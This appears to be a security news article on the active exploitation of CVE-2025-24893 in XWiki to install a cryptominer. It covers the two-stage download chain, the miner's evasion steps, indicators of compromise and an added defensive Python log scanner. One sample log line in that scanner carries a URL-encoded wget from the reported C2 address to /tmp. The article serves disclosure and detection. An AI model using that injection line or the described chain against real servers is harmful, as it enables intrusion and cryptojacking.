A critical security vulnerability in XWiki collaboration software is being actively exploited by threat actors to deploy cryptocurrency mining malware on vulnerable systems.
The flaw, tracked as CVE-2025-24893, represents a serious threat to organizations running unpatched XWiki installations.
Cybersecurity researchers at VulnCheck have captured concrete evidence of active exploitation through their canary network.
| CVE Details | Information |
| --- | --- |
| CVE ID | CVE-2025-24893 |
| Vulnerability Type | Unauthenticated Remote Template Injection |
| Affected Product | XWiki |
| Severity | Critical |
The attacks originate from Vietnam-based threat actors who employ a sophisticated two-stage attack methodology.
The initial exploitation occurs through XWiki’s SolrSearch endpoint, where attackers inject malicious code via a template injection vulnerability that requires no authentication.
The attack begins when hackers send a crafted request to the vulnerable endpoint, using URL-encoded parameters to execute remote commands.
The first stage downloads a small bash script from a command-and-control server located at IP address 193.32.208.24, which hosts malicious payloads through a transfer.sh instance.
This downloader is saved to the /tmp directory on compromised systems. After approximately 20 minutes, attackers return with a second request that executes the staged downloader, initiating the full infection chain.
The downloaded script immediately fetches two additional payloads that work together to establish persistence and deploy the mining operation.
One script installs a cryptocurrency miner called tcrond in a hidden directory, while the second script terminates competing miners and launches the malicious mining software configured to connect with c3pool.org mining pools.
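As an added defensive illustration (not code from VulnCheck's report or this article), the Python below scans constructed web-server access-log lines for requests to the SolrSearch endpoint whose URL-decoded query carries XWiki macro delimiters, the C2 address named above, or a /tmp path. The combined log format, the sample lines and the placeholder macro name are assumptions; the IP addresses are the ones the article reports.

```python
import re
from urllib.parse import urlsplit, unquote

# Indicators from the article: the download/C2 host and the attack source IP.
C2_INDICATORS = {"193.32.208.24", "123.25.249.88"}
# The article names the SolrSearch endpoint as the injection point.
ENDPOINT_MARKER = "SolrSearch"
# XWiki rendering macros are written as {{name}}...{{/name}}; a legitimate
# search string has no reason to carry these delimiters.
MACRO_RE = re.compile(r"\{\{/?[A-Za-z]+")
# Combined log format (assumed): client ident user [time] "METHOD target proto" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

def classify_request(line):
    """Return a finding dict for a suspicious SolrSearch request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    if ENDPOINT_MARKER not in target:
        return None
    # Decode twice so a doubly URL-encoded query is still inspected.
    decoded = unquote(unquote(urlsplit(target).query))
    reasons = []
    if MACRO_RE.search(decoded):
        reasons.append("macro-syntax-in-query")
    if any(ioc in decoded for ioc in C2_INDICATORS):
        reasons.append("known-c2-indicator")
    if "/tmp/" in decoded:
        reasons.append("writes-to-tmp")
    if not reasons:
        return None
    return {"src": m.group("ip"), "status": m.group("status"), "reasons": reasons}

def scan(lines):
    """Scan an iterable of access-log lines and return all findings."""
    return [f for f in map(classify_request, lines) if f]

# Constructed sample log lines (not real captures): an ordinary search, an
# unrelated page view, and a request whose query carries macro delimiters,
# the reported C2 IP and a /tmp destination.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2025:10:00:01 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=release+notes HTTP/1.1" 200 512',
    '198.51.100.9 - - [10/Mar/2025:10:00:05 +0000] "GET /xwiki/bin/view/Main/WebHome HTTP/1.1" 200 8192',
    '198.51.100.9 - - [10/Mar/2025:10:00:09 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7B%7Bmacro%7D%7Dwget%20http%3A%2F%2F193.32.208.24%2Fx%20-O%20%2Ftmp%2Fx%7B%7B%2Fmacro%7D%7D HTTP/1.1" 200 128',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Because the article notes the second request arrives roughly 20 minutes after the first, grouping findings by source IP over a window of that size helps separate a full infection chain from a single probe.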
Despite confirmed exploitation in the wild, CVE-2025-24893 notably does not appear on CISA’s Known Exploited Vulnerabilities catalog, highlighting a concerning gap between real-world attacks and official recognition.
VulnCheck added the vulnerability to their own KEV database in March 2025 after multiple security organizations including Cyble, Shadow Server, and CrowdSec reported exploitation attempts.
The mining malware deployed in these attacks is UPX-packed to evade detection and employs several anti-analysis techniques.
Once activated, the miner attempts to kill other cryptocurrency mining processes on the system, removes command history, and disables bash history logging to cover its tracks.
Security researchers identified the primary attack infrastructure at IP address 123.25.249.88, which has multiple reports on AbuseIPDB for malicious activity.
Organizations running XWiki should immediately update to patched versions and monitor their systems for indicators of compromise.
Network administrators should block communication with the identified malicious IP addresses and search for the specific file hashes associated with this campaign.
The vulnerability’s remote nature and lack of authentication requirements make it particularly dangerous for internet-facing XWiki installations.